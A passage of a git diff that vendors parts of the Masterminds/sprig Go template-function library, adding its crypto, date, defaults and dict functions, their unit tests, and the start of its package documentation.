+1,259 @@ +package sprig + +import ( + "crypto/x509" + "encoding/base64" + "encoding/pem" + "fmt" + "strings" + "testing" + + "github.com/stretchr/testify/assert" +) + +const ( + beginCertificate = "-----BEGIN CERTIFICATE-----" + endCertificate = "-----END CERTIFICATE-----" +) + +func TestSha256Sum(t *testing.T) { + tpl := `{{"abc" | sha256sum}}` + if err := runt(tpl, "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"); err != nil { + t.Error(err) + } +} +func TestSha1Sum(t *testing.T) { + tpl := `{{"abc" | sha1sum}}` + if err := runt(tpl, "a9993e364706816aba3e25717850c26c9cd0d89d"); err != nil { + t.Error(err) + } +} + +func TestDerivePassword(t *testing.T) { + expectations := map[string]string{ + `{{derivePassword 1 "long" "password" "user" "example.com"}}`: "ZedaFaxcZaso9*", + `{{derivePassword 2 "long" "password" "user" "example.com"}}`: "Fovi2@JifpTupx", + `{{derivePassword 1 "maximum" "password" "user" "example.com"}}`: "pf4zS1LjCg&LjhsZ7T2~", + `{{derivePassword 1 "medium" "password" "user" "example.com"}}`: "ZedJuz8$", + `{{derivePassword 1 "basic" "password" "user" "example.com"}}`: "pIS54PLs", + `{{derivePassword 1 "short" "password" "user" "example.com"}}`: "Zed5", + `{{derivePassword 1 "pin" "password" "user" "example.com"}}`: "6685", + } + + for tpl, result := range expectations { + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if 0 != strings.Compare(out, result) { + t.Error("Generated password does not match for", tpl) + } + } +} + +// NOTE(bacongobbler): this test is really _slow_ because of how long it takes to compute +// and generate a new crypto key. +func TestGenPrivateKey(t *testing.T) { + // test that calling by default generates an RSA private key + tpl := `{{genPrivateKey ""}}` + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if !strings.Contains(out, "RSA PRIVATE KEY") { + t.Error("Expected RSA PRIVATE KEY") + } + // test all acceptable arguments + tpl = `{{genPrivateKey "rsa"}}` + out, err = runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if !strings.Contains(out, "RSA PRIVATE KEY") { + t.Error("Expected RSA PRIVATE KEY") + } + tpl = `{{genPrivateKey "dsa"}}` + out, err = runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if !strings.Contains(out, "DSA PRIVATE KEY") { + t.Error("Expected DSA PRIVATE KEY") + } + tpl = `{{genPrivateKey "ecdsa"}}` + out, err = runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if !strings.Contains(out, "EC PRIVATE KEY") { + t.Error("Expected EC PRIVATE KEY") + } + // test bad + tpl = `{{genPrivateKey "bad"}}` + out, err = runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if out != "Unknown type bad" { + t.Error("Expected type 'bad' to be an unknown crypto algorithm") + } + // ensure that we can base64 encode the string + tpl = `{{genPrivateKey "rsa" | b64enc}}` + out, err = runRaw(tpl, nil) + if err != nil { + t.Error(err) + } +} + +func TestUUIDGeneration(t *testing.T) { + tpl := `{{uuidv4}}` + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + + if len(out) != 36 { + t.Error("Expected UUID of length 36") + } + + out2, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + + if out == out2 { + t.Error("Expected subsequent UUID generations to be different") + } +} + +func TestBuildCustomCert(t *testing.T) { + ca, _ := generateCertificateAuthority("example.com", 365) + tpl := fmt.Sprintf( + `{{- $ca := buildCustomCert "%s" "%s"}} +{{- $ca.Cert }}`, + base64.StdEncoding.EncodeToString([]byte(ca.Cert)), + base64.StdEncoding.EncodeToString([]byte(ca.Key)), + ) + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + + tpl2 := fmt.Sprintf( + `{{- $ca := buildCustomCert "%s" "%s"}} +{{- $ca.Cert }}`, + base64.StdEncoding.EncodeToString([]byte("fail")), + base64.StdEncoding.EncodeToString([]byte(ca.Key)), + ) + out2, _ := runRaw(tpl2, nil) + + assert.Equal(t, out, ca.Cert) + assert.NotEqual(t, out2, ca.Cert) +} + +func TestGenCA(t *testing.T) { + const cn = "foo-ca" + + tpl := fmt.Sprintf( + `{{- $ca := genCA "%s" 365 }} +{{ $ca.Cert }} +`, + cn, + ) + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + assert.Contains(t, out, beginCertificate) + assert.Contains(t, out, endCertificate) + + decodedCert, _ := pem.Decode([]byte(out)) + assert.Nil(t, err) + cert, err := x509.ParseCertificate(decodedCert.Bytes) + assert.Nil(t, err) + + assert.Equal(t, cn, cert.Subject.CommonName) + assert.True(t, cert.IsCA) +} + +func TestGenSelfSignedCert(t *testing.T) { + const ( + cn = "foo.com" + ip1 = "10.0.0.1" + ip2 = "10.0.0.2" + dns1 = "bar.com" + dns2 = "bat.com" + ) + + tpl := fmt.Sprintf( + `{{- $cert := genSelfSignedCert "%s" (list "%s" "%s") (list "%s" "%s") 365 }} +{{ $cert.Cert }}`, + cn, + ip1, + ip2, + dns1, + dns2, + ) + + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + assert.Contains(t, out, beginCertificate) + assert.Contains(t, out, endCertificate) + + decodedCert, _ := pem.Decode([]byte(out)) + assert.Nil(t, err) + cert, err := x509.ParseCertificate(decodedCert.Bytes) + assert.Nil(t, err) + + assert.Equal(t, cn, cert.Subject.CommonName) + assert.Equal(t, 2, len(cert.IPAddresses)) + assert.Equal(t, ip1, cert.IPAddresses[0].String()) + assert.Equal(t, ip2, cert.IPAddresses[1].String()) + assert.Contains(t, cert.DNSNames, dns1) + assert.Contains(t, cert.DNSNames, dns2) + assert.False(t, cert.IsCA) +} + +func TestGenSignedCert(t *testing.T) { + const ( + cn = "foo.com" + ip1 = "10.0.0.1" + ip2 = "10.0.0.2" + dns1 = "bar.com" + dns2 = "bat.com" + ) + + tpl := fmt.Sprintf( + `{{- $ca := genCA "foo" 365 }} +{{- $cert := genSignedCert "%s" (list "%s" "%s") (list "%s" "%s") 365 $ca }} +{{ $cert.Cert }} +`, + cn, + ip1, + ip2, + dns1, + dns2, + ) + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + + assert.Contains(t, out, beginCertificate) + assert.Contains(t, out, endCertificate) + + decodedCert, _ := pem.Decode([]byte(out)) + assert.Nil(t, err) + cert, err := x509.ParseCertificate(decodedCert.Bytes) + assert.Nil(t, err) + + assert.Equal(t, cn, cert.Subject.CommonName) + assert.Equal(t, 2, len(cert.IPAddresses)) + assert.Equal(t, ip1, cert.IPAddresses[0].String()) + assert.Equal(t, ip2, cert.IPAddresses[1].String()) + assert.Contains(t, cert.DNSNames, dns1) + assert.Contains(t, cert.DNSNames, dns2) + assert.False(t, cert.IsCA) +} diff --git a/vendor/github.com/Masterminds/sprig/date.go b/vendor/github.com/Masterminds/sprig/date.go new file mode 100644 index 0000000000..1c2c3653c8 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/date.go @@ -0,0 +1,76 @@ +package sprig + +import ( + "time" +) + +// Given a format and a date, format the date string. +// +// Date can be a `time.Time` or an `int, int32, int64`. +// In the later case, it is treated as seconds since UNIX +// epoch. +func date(fmt string, date interface{}) string { + return dateInZone(fmt, date, "Local") +} + +func htmlDate(date interface{}) string { + return dateInZone("2006-01-02", date, "Local") +} + +func htmlDateInZone(date interface{}, zone string) string { + return dateInZone("2006-01-02", date, zone) +} + +func dateInZone(fmt string, date interface{}, zone string) string { + var t time.Time + switch date := date.(type) { + default: + t = time.Now() + case time.Time: + t = date + case int64: + t = time.Unix(date, 0) + case int: + t = time.Unix(int64(date), 0) + case int32: + t = time.Unix(int64(date), 0) + } + + loc, err := time.LoadLocation(zone) + if err != nil { + loc, _ = time.LoadLocation("UTC") + } + + return t.In(loc).Format(fmt) +} + +func dateModify(fmt string, date time.Time) time.Time { + d, err := time.ParseDuration(fmt) + if err != nil { + return date + } + return date.Add(d) +} + +func dateAgo(date interface{}) string { + var t time.Time + + switch date := date.(type) { + default: + t = time.Now() + case time.Time: + t = date + case int64: + t = time.Unix(date, 0) + case int: + t = time.Unix(int64(date), 0) + } + // Drop resolution to seconds + duration := time.Since(t).Round(time.Second) + return duration.String() +} + +func toDate(fmt, str string) time.Time { + t, _ := time.ParseInLocation(fmt, str, time.Local) + return t +} diff --git a/vendor/github.com/Masterminds/sprig/date_test.go b/vendor/github.com/Masterminds/sprig/date_test.go new file mode 100644 index 0000000000..b98200dd03 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/date_test.go @@ -0,0 +1,36 @@ +package sprig + +import ( + "testing" + "time" +) + +func TestHtmlDate(t *testing.T) { + t.Skip() + tpl := `{{ htmlDate 0}}` + if err := runt(tpl, "1970-01-01"); err != nil { + t.Error(err) + } +} + +func TestAgo(t *testing.T) { + tpl := "{{ ago .Time }}" + if err := runtv(tpl, "2m5s", map[string]interface{}{"Time": time.Now().Add(-125 * time.Second)}); err != nil { + t.Error(err) + } + + if err := runtv(tpl, "2h34m17s", map[string]interface{}{"Time": time.Now().Add(-(2*3600 + 34*60 + 17) * time.Second)}); err != nil { + t.Error(err) + } + + if err := runtv(tpl, "-5s", map[string]interface{}{"Time": time.Now().Add(5 * time.Second)}); err != nil { + t.Error(err) + } +} + +func TestToDate(t *testing.T) { + tpl := `{{toDate "2006-01-02" "2017-12-31" | date "02/01/2006"}}` + if err := runt(tpl, "31/12/2017"); err != nil { + t.Error(err) + } +} diff --git a/vendor/github.com/Masterminds/sprig/defaults.go b/vendor/github.com/Masterminds/sprig/defaults.go new file mode 100644 index 0000000000..f0161317dc --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/defaults.go @@ -0,0 +1,84 @@ +package sprig + +import ( + "encoding/json" + "reflect" +) + +// dfault checks whether `given` is set, and returns default if not set. +// +// This returns `d` if `given` appears not to be set, and `given` otherwise. +// +// For numeric types 0 is unset. +// For strings, maps, arrays, and slices, len() = 0 is considered unset. +// For bool, false is unset. +// Structs are never considered unset. +// +// For everything else, including pointers, a nil value is unset. +func dfault(d interface{}, given ...interface{}) interface{} { + + if empty(given) || empty(given[0]) { + return d + } + return given[0] +} + +// empty returns true if the given value has the zero value for its type. +func empty(given interface{}) bool { + g := reflect.ValueOf(given) + if !g.IsValid() { + return true + } + + // Basically adapted from text/template.isTrue + switch g.Kind() { + default: + return g.IsNil() + case reflect.Array, reflect.Slice, reflect.Map, reflect.String: + return g.Len() == 0 + case reflect.Bool: + return g.Bool() == false + case reflect.Complex64, reflect.Complex128: + return g.Complex() == 0 + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return g.Int() == 0 + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return g.Uint() == 0 + case reflect.Float32, reflect.Float64: + return g.Float() == 0 + case reflect.Struct: + return false + } + return true +} + +// coalesce returns the first non-empty value. +func coalesce(v ...interface{}) interface{} { + for _, val := range v { + if !empty(val) { + return val + } + } + return nil +} + +// toJson encodes an item into a JSON string +func toJson(v interface{}) string { + output, _ := json.Marshal(v) + return string(output) +} + +// toPrettyJson encodes an item into a pretty (indented) JSON string +func toPrettyJson(v interface{}) string { + output, _ := json.MarshalIndent(v, "", " ") + return string(output) +} + +// ternary returns the first value if the last value is true, otherwise returns the second value. +func ternary(vt interface{}, vf interface{}, v bool) interface{} { + if v { + return vt + } + + return vf +} diff --git a/vendor/github.com/Masterminds/sprig/defaults_test.go b/vendor/github.com/Masterminds/sprig/defaults_test.go new file mode 100644 index 0000000000..226d914cbf --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/defaults_test.go @@ -0,0 +1,129 @@ +package sprig + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestDefault(t *testing.T) { + tpl := `{{"" | default "foo"}}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } + tpl = `{{default "foo" 234}}` + if err := runt(tpl, "234"); err != nil { + t.Error(err) + } + tpl = `{{default "foo" 2.34}}` + if err := runt(tpl, "2.34"); err != nil { + t.Error(err) + } + + tpl = `{{ .Nothing | default "123" }}` + if err := runt(tpl, "123"); err != nil { + t.Error(err) + } + tpl = `{{ default "123" }}` + if err := runt(tpl, "123"); err != nil { + t.Error(err) + } +} + +func TestEmpty(t *testing.T) { + tpl := `{{if empty 1}}1{{else}}0{{end}}` + if err := runt(tpl, "0"); err != nil { + t.Error(err) + } + + tpl = `{{if empty 0}}1{{else}}0{{end}}` + if err := runt(tpl, "1"); err != nil { + t.Error(err) + } + tpl = `{{if empty ""}}1{{else}}0{{end}}` + if err := runt(tpl, "1"); err != nil { + t.Error(err) + } + tpl = `{{if empty 0.0}}1{{else}}0{{end}}` + if err := runt(tpl, "1"); err != nil { + t.Error(err) + } + tpl = `{{if empty false}}1{{else}}0{{end}}` + if err := runt(tpl, "1"); err != nil { + t.Error(err) + } + + dict := map[string]interface{}{"top": map[string]interface{}{}} + tpl = `{{if empty .top.NoSuchThing}}1{{else}}0{{end}}` + if err := runtv(tpl, "1", dict); err != nil { + t.Error(err) + } + tpl = `{{if empty .bottom.NoSuchThing}}1{{else}}0{{end}}` + if err := runtv(tpl, "1", dict); err != nil { + t.Error(err) + } +} +func TestCoalesce(t *testing.T) { + tests := map[string]string{ + `{{ coalesce 1 }}`: "1", + `{{ coalesce "" 0 nil 2 }}`: "2", + `{{ $two := 2 }}{{ coalesce "" 0 nil $two }}`: "2", + `{{ $two := 2 }}{{ coalesce "" $two 0 0 0 }}`: "2", + `{{ $two := 2 }}{{ coalesce "" $two 3 4 5 }}`: "2", + `{{ coalesce }}`: "", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } + + dict := map[string]interface{}{"top": map[string]interface{}{}} + tpl := `{{ coalesce .top.NoSuchThing .bottom .bottom.dollar "airplane"}}` + if err := runtv(tpl, "airplane", dict); err != nil { + t.Error(err) + } +} + +func TestToJson(t *testing.T) { + dict := map[string]interface{}{"Top": map[string]interface{}{"bool": true, "string": "test", "number": 42}} + + tpl := `{{.Top | toJson}}` + expected := `{"bool":true,"number":42,"string":"test"}` + if err := runtv(tpl, expected, dict); err != nil { + t.Error(err) + } +} + +func TestToPrettyJson(t *testing.T) { + dict := map[string]interface{}{"Top": map[string]interface{}{"bool": true, "string": "test", "number": 42}} + tpl := `{{.Top | toPrettyJson}}` + expected := `{ + "bool": true, + "number": 42, + "string": "test" +}` + if err := runtv(tpl, expected, dict); err != nil { + t.Error(err) + } +} + +func TestTernary(t *testing.T) { + tpl := `{{true | ternary "foo" "bar"}}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } + + tpl = `{{ternary "foo" "bar" true}}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } + + tpl = `{{false | ternary "foo" "bar"}}` + if err := runt(tpl, "bar"); err != nil { + t.Error(err) + } + + tpl = `{{ternary "foo" "bar" false}}` + if err := runt(tpl, "bar"); err != nil { + t.Error(err) + } +} diff --git a/vendor/github.com/Masterminds/sprig/dict.go b/vendor/github.com/Masterminds/sprig/dict.go new file mode 100644 index 0000000000..59076c0182 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/dict.go @@ -0,0 +1,88 @@ +package sprig + +import "github.com/imdario/mergo" + +func set(d map[string]interface{}, key string, value interface{}) map[string]interface{} { + d[key] = value + return d +} + +func unset(d map[string]interface{}, key string) map[string]interface{} { + delete(d, key) + return d +} + +func hasKey(d map[string]interface{}, key string) bool { + _, ok := d[key] + return ok +} + +func pluck(key string, d ...map[string]interface{}) []interface{} { + res := []interface{}{} + for _, dict := range d { + if val, ok := dict[key]; ok { + res = append(res, val) + } + } + return res +} + +func keys(dicts ...map[string]interface{}) []string { + k := []string{} + for _, dict := range dicts { + for key := range dict { + k = append(k, key) + } + } + return k +} + +func pick(dict map[string]interface{}, keys ...string) map[string]interface{} { + res := map[string]interface{}{} + for _, k := range keys { + if v, ok := dict[k]; ok { + res[k] = v + } + } + return res +} + +func omit(dict map[string]interface{}, keys ...string) map[string]interface{} { + res := map[string]interface{}{} + + omit := make(map[string]bool, len(keys)) + for _, k := range keys { + omit[k] = true + } + + for k, v := range dict { + if _, ok := omit[k]; !ok { + res[k] = v + } + } + return res +} + +func dict(v ...interface{}) map[string]interface{} { + dict := map[string]interface{}{} + lenv := len(v) + for i := 0; i < lenv; i += 2 { + key := strval(v[i]) + if i+1 >= lenv { + dict[key] = "" + continue + } + dict[key] = v[i+1] + } + return dict +} + +func merge(dst map[string]interface{}, srcs ...map[string]interface{}) interface{} { + for _, src := range srcs { + if err := mergo.Merge(&dst, src); err != nil { + // Swallow errors inside of a template. + return "" + } + } + return dst +} diff --git a/vendor/github.com/Masterminds/sprig/dict_test.go b/vendor/github.com/Masterminds/sprig/dict_test.go new file mode 100644 index 0000000000..4ceb40a3db --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/dict_test.go @@ -0,0 +1,175 @@ +package sprig + +import ( + "strings" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestDict(t *testing.T) { + tpl := `{{$d := dict 1 2 "three" "four" 5}}{{range $k, $v := $d}}{{$k}}{{$v}}{{end}}` + out, err := runRaw(tpl, nil) + if err != nil { + t.Error(err) + } + if len(out) != 12 { + t.Errorf("Expected length 12, got %d", len(out)) + } + // dict does not guarantee ordering because it is backed by a map. + if !strings.Contains(out, "12") { + t.Error("Expected grouping 12") + } + if !strings.Contains(out, "threefour") { + t.Error("Expected grouping threefour") + } + if !strings.Contains(out, "5") { + t.Error("Expected 5") + } + tpl = `{{$t := dict "I" "shot" "the" "albatross"}}{{$t.the}} {{$t.I}}` + if err := runt(tpl, "albatross shot"); err != nil { + t.Error(err) + } +} + +func TestUnset(t *testing.T) { + tpl := `{{- $d := dict "one" 1 "two" 222222 -}} + {{- $_ := unset $d "two" -}} + {{- range $k, $v := $d}}{{$k}}{{$v}}{{- end -}} + ` + + expect := "one1" + if err := runt(tpl, expect); err != nil { + t.Error(err) + } +} +func TestHasKey(t *testing.T) { + tpl := `{{- $d := dict "one" 1 "two" 222222 -}} + {{- if hasKey $d "one" -}}1{{- end -}} + ` + + expect := "1" + if err := runt(tpl, expect); err != nil { + t.Error(err) + } +} + +func TestPluck(t *testing.T) { + tpl := ` + {{- $d := dict "one" 1 "two" 222222 -}} + {{- $d2 := dict "one" 1 "two" 33333 -}} + {{- $d3 := dict "one" 1 -}} + {{- $d4 := dict "one" 1 "two" 4444 -}} + {{- pluck "two" $d $d2 $d3 $d4 -}} + ` + + expect := "[222222 33333 4444]" + if err := runt(tpl, expect); err != nil { + t.Error(err) + } +} + +func TestKeys(t *testing.T) { + tests := map[string]string{ + `{{ dict "foo" 1 "bar" 2 | keys | sortAlpha }}`: "[bar foo]", + `{{ dict | keys }}`: "[]", + `{{ keys (dict "foo" 1) (dict "bar" 2) (dict "bar" 3) | uniq | sortAlpha }}`: "[bar foo]", + } + for tpl, expect := range tests { + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + } +} + +func TestPick(t *testing.T) { + tests := map[string]string{ + `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "two" | len -}}`: "1", + `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "two" -}}`: "map[two:222222]", + `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "one" "two" | len -}}`: "2", + `{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "one" "two" "three" | len -}}`: "2", + `{{- $d := dict }}{{ pick $d "two" | len -}}`: "0", + } + for tpl, expect := range tests { + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + } +} +func TestOmit(t *testing.T) { + tests := map[string]string{ + `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" | len -}}`: "1", + `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" -}}`: "map[two:222222]", + `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" "two" | len -}}`: "0", + `{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "two" "three" | len -}}`: "1", + `{{- $d := dict }}{{ omit $d "two" | len -}}`: "0", + } + for tpl, expect := range tests { + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + } +} + +func TestSet(t *testing.T) { + tpl := `{{- $d := dict "one" 1 "two" 222222 -}} + {{- $_ := set $d "two" 2 -}} + {{- $_ := set $d "three" 3 -}} + {{- if hasKey $d "one" -}}{{$d.one}}{{- end -}} + {{- if hasKey $d "two" -}}{{$d.two}}{{- end -}} + {{- if hasKey $d "three" -}}{{$d.three}}{{- end -}} + ` + + expect := "123" + if err := runt(tpl, expect); err != nil { + t.Error(err) + } +} + +func TestMerge(t *testing.T) { + dict := map[string]interface{}{ + "src2": map[string]interface{}{ + "h": 10, + "i": "i", + "j": "j", + }, + "src1": map[string]interface{}{ + "a": 1, + "b": 2, + "d": map[string]interface{}{ + "e": "four", + }, + "g": []int{6, 7}, + "i": "aye", + "j": "jay", + }, + "dst": map[string]interface{}{ + "a": "one", + "c": 3, + "d": map[string]interface{}{ + "f": 5, + }, + "g": []int{8, 9}, + "i": "eye", + }, + } + tpl := `{{merge .dst .src1 .src2}}` + _, err := runRaw(tpl, dict) + if err != nil { + t.Error(err) + } + expected := map[string]interface{}{ + "a": "one", // key overridden + "b": 2, // merged from src1 + "c": 3, // merged from dst + "d": map[string]interface{}{ // deep merge + "e": "four", + "f": 5, + }, + "g": []int{8, 9}, // overridden - arrays are not merged + "h": 10, // merged from src2 + "i": "eye", // overridden twice + "j": "jay", // overridden and merged + } + assert.Equal(t, expected, dict["dst"]) +} diff --git a/vendor/github.com/Masterminds/sprig/doc.go b/vendor/github.com/Masterminds/sprig/doc.go new file mode 100644 index 0000000000..92ea318c7e --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/doc.go @@ -0,0 +1,233 @@ +/* +Sprig: Template functions for Go. + +This package contains a number of utility functions for working with data +inside of Go `html/template` and `text/template` files. + +To add these functions, use the `template.Funcs()` method: + + t := templates.New("foo").Funcs(sprig.FuncMap()) + +Note that you should add the function map before you parse any template files. + + In several cases, Sprig reverses the order of arguments from the way they + appear in the standard library. This is to make it easier to pipe + arguments into functions. + +Date Functions + + - date FORMAT TIME: Format a date, where a date is an integer type or a time.Time type, and + format is a time.Format formatting string. + - dateModify: Given a date, modify it with a duration: `date_modify "-1.5h" now`. If the duration doesn't + parse, it returns the time unaltered. See `time.ParseDuration` for info on duration strings. + - now: Current time.Time, for feeding into date-related functions. + - htmlDate TIME: Format a date for use in the value field of an HTML "date" form element. + - dateInZone FORMAT TIME TZ: Like date, but takes three arguments: format, timestamp, + timezone. + - htmlDateInZone TIME TZ: Like htmlDate, but takes two arguments: timestamp, + timezone. + +String Functions + + - abbrev: Truncate a string with ellipses. `abbrev 5 "hello world"` yields "he..." + - abbrevboth: Abbreviate from both sides, yielding "...lo wo..." + - trunc: Truncate a string (no suffix). `trunc 5 "Hello World"` yields "hello". + - trim: strings.TrimSpace + - trimAll: strings.Trim, but with the argument order reversed `trimAll "$" "$5.00"` or `"$5.00 | trimAll "$"` + - trimSuffix: strings.TrimSuffix, but with the argument order reversed: `trimSuffix "-" "ends-with-"` + - trimPrefix: strings.TrimPrefix, but with the argument order reversed `trimPrefix "$" "$5"` + - upper: strings.ToUpper + - lower: strings.ToLower + - nospace: Remove all space characters from a string. `nospace "h e l l o"` becomes "hello" + - title: strings.Title + - untitle: Remove title casing + - repeat: strings.Repeat, but with the arguments switched: `repeat count str`. (This simplifies common pipelines) + - substr: Given string, start, and length, return a substr. + - initials: Given a multi-word string, return the initials. `initials "Matt Butcher"` returns "MB" + - randAlphaNum: Given a length, generate a random alphanumeric sequence + - randAlpha: Given a length, generate an alphabetic string + - randAscii: Given a length, generate a random ASCII string (symbols included) + - randNumeric: Given a length, generate a string of digits. + - swapcase: SwapCase swaps the case of a string using a word based algorithm. see https://godoc.org/github.com/Masterminds/goutils#SwapCase + - shuffle: Shuffle randomizes runes in a string and returns the result. It uses default random source in `math/rand` + - snakecase: convert all upper case characters in a string to underscore format. + - camelcase: convert all lower case characters behind underscores to upper case character + - wrap: Force a line wrap at the given width. `wrap 80 "imagine a longer string"` + - wrapWith: Wrap a line at the given length, but using 'sep' instead of a newline. `wrapWith 50, "
", $html` + - contains: strings.Contains, but with the arguments switched: `contains substr str`. (This simplifies common pipelines) + - hasPrefix: strings.hasPrefix, but with the arguments switched + - hasSuffix: strings.hasSuffix, but with the arguments switched + - quote: Wrap string(s) in double quotation marks, escape the contents by adding '\' before '"'. + - squote: Wrap string(s) in double quotation marks, does not escape content. + - cat: Concatenate strings, separating them by spaces. `cat $a $b $c`. + - indent: Indent a string using space characters. `indent 4 "foo\nbar"` produces " foo\n bar" + - nindent: Indent a string using space characters and prepend a new line. `indent 4 "foo\nbar"` produces "\n foo\n bar" + - replace: Replace an old with a new in a string: `$name | replace " " "-"` + - plural: Choose singular or plural based on length: `len $fish | plural "one anchovy" "many anchovies"` + - sha256sum: Generate a hex encoded sha256 hash of the input + - toString: Convert something to a string + +String Slice Functions: + + - join: strings.Join, but as `join SEP SLICE` + - split: strings.Split, but as `split SEP STRING`. The results are returned + as a map with the indexes set to _N, where N is an integer starting from 0. + Use it like this: `{{$v := "foo/bar/baz" | split "/"}}{{$v._0}}` (Prints `foo`) + - splitList: strings.Split, but as `split SEP STRING`. The results are returned + as an array. + - toStrings: convert a list to a list of strings. 'list 1 2 3 | toStrings' produces '["1" "2" "3"]' + - sortAlpha: sort a list lexicographically. + +Integer Slice Functions: + + - until: Given an integer, returns a slice of counting integers from 0 to one + less than the given integer: `range $i, $e := until 5` + - untilStep: Given start, stop, and step, return an integer slice starting at + 'start', stopping at `stop`, and incrementing by 'step. This is the same + as Python's long-form of 'range'. + +Conversions: + + - atoi: Convert a string to an integer. 0 if the integer could not be parsed. + - int64: Convert a string or another numeric type to an int64. + - int: Convert a string or another numeric type to an int. + - float64: Convert a string or another numeric type to a float64. + +Defaults: + + - default: Give a default value. Used like this: trim " "| default "empty". + Since trim produces an empty string, the default value is returned. For + things with a length (strings, slices, maps), len(0) will trigger the default. + For numbers, the value 0 will trigger the default. For booleans, false will + trigger the default. For structs, the default is never returned (there is + no clear empty condition). For everything else, nil value triggers a default. + - empty: Return true if the given value is the zero value for its type. + Caveats: structs are always non-empty. This should match the behavior of + {{if pipeline}}, but can be used inside of a pipeline. + - coalesce: Given a list of items, return the first non-empty one. + This follows the same rules as 'empty'. '{{ coalesce .someVal 0 "hello" }}` + will return `.someVal` if set, or else return "hello". The 0 is skipped + because it is an empty value. + - compact: Return a copy of a list with all of the empty values removed. + 'list 0 1 2 "" | compact' will return '[1 2]' + - ternary: Given a value,'true | ternary "b" "c"' will return "b". + 'false | ternary "b" "c"' will return '"c"'. Similar to the JavaScript ternary + operator. + +OS: + - env: Resolve an environment variable + - expandenv: Expand a string through the environment + +File Paths: + - base: Return the last element of a path. https://golang.org/pkg/path#Base + - dir: Remove the last element of a path. https://golang.org/pkg/path#Dir + - clean: Clean a path to the shortest equivalent name. (e.g. remove "foo/.." + from "foo/../bar.html") https://golang.org/pkg/path#Clean + - ext: https://golang.org/pkg/path#Ext + - isAbs: https://golang.org/pkg/path#IsAbs + +Encoding: + - b64enc: Base 64 encode a string. + - b64dec: Base 64 decode a string. + +Reflection: + + - typeOf: Takes an interface and returns a string representation of the type. + For pointers, this will return a type prefixed with an asterisk(`*`). So + a pointer to type `Foo` will be `*Foo`. + - typeIs: Compares an interface with a string name, and returns true if they match. + Note that a pointer will not match a reference. For example `*Foo` will not + match `Foo`. + - typeIsLike: Compares an interface with a string name and returns true if + the interface is that `name` or that `*name`. In other words, if the given + value matches the given type or is a pointer to the given type, this returns + true. + - kindOf: Takes an interface and returns a string representation of its kind. + - kindIs: Returns true if the given string matches the kind of the given interface. + + Note: None of these can test whether or not something implements a given + interface, since doing so would require compiling the interface in ahead of + time. + +Data Structures: + + - tuple: Takes an arbitrary list of items and returns a slice of items. Its + tuple-ish properties are mainly gained through the template idiom, and not + through an API provided here. WARNING: The implementation of tuple will + change in the future. + - list: An arbitrary ordered list of items. (This is prefered over tuple.) + - dict: Takes a list of name/values and returns a map[string]interface{}. + The first parameter is converted to a string and stored as a key, the + second parameter is treated as the value. And so on, with odds as keys and + evens as values. If the function call ends with an odd, the last key will + be assigned the empty string. Non-string keys are converted to strings as + follows: []byte are converted, fmt.Stringers will have String() called. + errors will have Error() called. All others will be passed through + fmt.Sprintf("%v"). + +Lists Functions: + +These are used to manipulate lists: '{{ list 1 2 3 | reverse | first }}' + + - first: Get the first item in a 'list'. 'list 1 2 3 | first' prints '1' + - last: Get the last item in a 'list': 'list 1 2 3 | last ' prints '3' + - rest: Get all but the first item in a list: 'list 1 2 3 | rest' returns '[2 3]' + - initial: Get all but the last item in a list: 'list 1 2 3 | initial' returns '[1 2]' + - append: Add an item to the end of a list: 'append $list 4' adds '4' to the end of '$list' + - prepend: Add an item to the beginning of a list: 'prepend $list 4' puts 4 at the beginning of the list. + - reverse: Reverse the items in a list. + - uniq: Remove duplicates from a list. + - without: Return a list with the given values removed: 'without (list 1 2 3) 1' would return '[2 3]' + - has: Return 'true' if the item is found in the list: 'has "foo" $list' will return 'true' if the list contains "foo" + +Dict Functions: + +These are used to manipulate dicts. + + - set: Takes a dict, a key, and a value, and sets that key/value pair in + the dict. `set $dict $key $value`. For convenience, it returns the dict, + even though the dict was modified in place. + - unset: Takes a dict and a key, and deletes that key/value pair from the + dict. `unset $dict $key`. This returns the dict for convenience. + - hasKey: Takes a dict and a key, and returns boolean true if the key is in + the dict. + - pluck: Given a key and one or more maps, get all of the values for that key. + - keys: Get an array of all of the keys in one or more dicts. + - pick: Select just the given keys out of the dict, and return a new dict. + - omit: Return a dict without the given keys. + +Math Functions: + +Integer functions will convert integers of any width to 